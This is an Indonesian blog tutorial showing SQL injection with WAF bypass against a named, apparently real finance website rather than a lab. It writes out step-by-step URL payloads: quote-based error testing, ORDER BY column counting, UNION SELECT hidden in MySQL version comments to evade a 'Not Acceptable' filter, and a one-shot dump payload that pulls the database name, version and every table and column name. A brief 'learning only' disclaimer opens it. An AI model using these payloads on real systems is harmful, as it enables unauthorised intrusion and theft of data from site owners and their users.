SQL Injection bypass waf ( no acceptable ) #2
 |
| sql bypass |
Tutorial SQL Injection bypass waf ( not acceptable ) part 2
Perhatian: Tutorial pada halaman ini hanyalah pembelajaran semata, jika anda menerapkan tutorial pada halaman ini untuk sebuah penyerangan jangan salahkan saya, saya tidak akan bertanggung jawab atas apa yang anda lakukan nantinya, karena halaman ini tidak menyarankan anda untuk melakukan hal buruk pada website yang anda inject
Assalamualaikum, halo pengunjung selamat datang di blog Shadow Secure System, pada halaman kali ini saya memberikan tutorial SQL Injection.
Target website yang bakalan inject:
https://www.financeoptima.com/site:urlwebsite.com .php?= |
| mencari parameter |
https://www.financeoptima.com/blog_detail.php?id=3' |
| error |
Nah, saat saya kasi tanda ' halamannya jadi berubah, atau muncul error, brarti webnya vuln sql injection, klo udh gitu kasi tanda --+- atau -- -, contoh.
https://www.financeoptima.com/blog_detail.php?id=3'--+-PNah kan kembali lagi ke home, kalo gitu lanjut ke langkah selanjutnya yaitu memasukan query order by atau sejenisnya seperti group by, oke langsung aja kelangkah selanjutnya.
https://www.financeoptima.com/blog_detail.php?id=3'+order+by+1--+- NORMAL
https://www.financeoptima.com/blog_detail.php?id=3'+order+by+2--+- NORMAL
https://www.financeoptima.com/blog_detail.php?id=3'+order+by+3--+- NORMAL
https://www.financeoptima.com/blog_detail.php?id=3'+order+by+4--+- NORMAL
https://www.financeoptima.com/blog_detail.php?id=3'+order+by+5--+- NORMAL
https://www.financeoptima.com/blog_detail.php?id=3'+order+by+6--+- NORMAL
https://www.financeoptima.com/blog_detail.php?id=3'+order+by+7--+- NORMAL
https://www.financeoptima.com/blog_detail.php?id=3'+order+by+8--+- ERROR
ternyata jumlah kolomnya ada 7,sesuai query yg dimasukan, karena Errornya diangka 8 berarti jumlah kolomnya ada 7,oke langkah selanjutnya adalah memasukan query union select untuk mengetahui angka togelnya sekaligus menambahkan tanda - dibelakang angka parameter, contoh.
https://www.financeoptima.com/blog_detail.php?id=-3'+union+select+1,2,3,4,5,6,7--+-
 |
| sql bypass |
Disini kita ditampilakan kata "Not Acceptable!" nah untuk mengatasinya perlu kita bypass coba ubah
+union+select+
+/*!12345union+select*/+
Oke disini kita ditampilkan bahwa terdapat angka togelnya, seperti query diatas bahwa jumlah angka 1 sampai 7 tergantung jumlah Kolomnya hugs, jadi kalo jumlah kolomnya ada 100 berarti saat query union select 1 sampai 100, oke disini angka togelnya sudah muncul, jadi tinggal tempel aja dios sqli anda sesuai angka yang muncul pada halaman di url query union select, contoh.
https://www.financeoptima.com/blog_detail.php?id=-3%27+/*!12345union+select*/+1,2,concat(0x496E6A6563746564204279204D722058202D2054776F2047616E73202626202E2F4E616E615F43616E73,%27%3Cbr%3E%27,database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),4,5,6,7--+-
https://www.financeoptima.com/blog_detail.php?id=-3'+union+select+1,2,/*!12345concat(0x496E6A6563746564204279204D722058202D2054776F2047616E73202626202E2F4E616E615F43616E73,%27%3Cbr%3E%27,database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))*/,4,5,6,7--+-
Nah berikut adalah tampilan halaman saat di execute.
 |
| sql bypass |
Jika masih tidak paham, anda bisa menonton video dibawah.
Nahkan isi databasenya muncul, okelah sekian tutorial sql injection bypass waf ( not acceptable ) pada halaman ini, jika ada kesalahan ataupun kekurangan pada halaman ini saya pribadi mohon maaf, Wassalamualaikum.
Posting Komentar